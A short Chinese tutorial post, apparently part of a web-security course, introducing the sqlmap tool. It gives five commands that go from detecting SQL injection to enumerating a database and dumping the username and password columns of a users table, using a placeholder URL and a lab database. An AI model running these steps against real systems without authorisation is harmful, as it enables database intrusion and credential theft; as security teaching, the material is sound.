风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一)

[风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一)](https://www.bilibili.com/video/bv17A411j7Yk?p=17)

#### sqlmap的使用

> sqlmap 是一个开源渗透测试工具，它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎，同时有众多功能，包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

项目地址： https://github.com/sqlmapproject/sqlmap

- 第一步：`-u "xxx" ` -u 参数指定地址然后进行注入
- 第二步 `-u "xxx" --current-db` 获取到当前数据库信息
- 第三步 `-u "xxx" -D dbvuln --tables` 获取数据库中的表名
- 第四步 `-u "xxx" -D dbvuln -T users --columns` 获取表名中的字段
- 第五步 `-u "xxx" -D dbvuln -T users -C username,password --dump ` 获取表中的内容

标签：Sqlmap,WEB,风炫,dbvuln,--,数据库,xxx,获取,sqlmap
来源： https://www.cnblogs.com/fxsec/p/14236570.html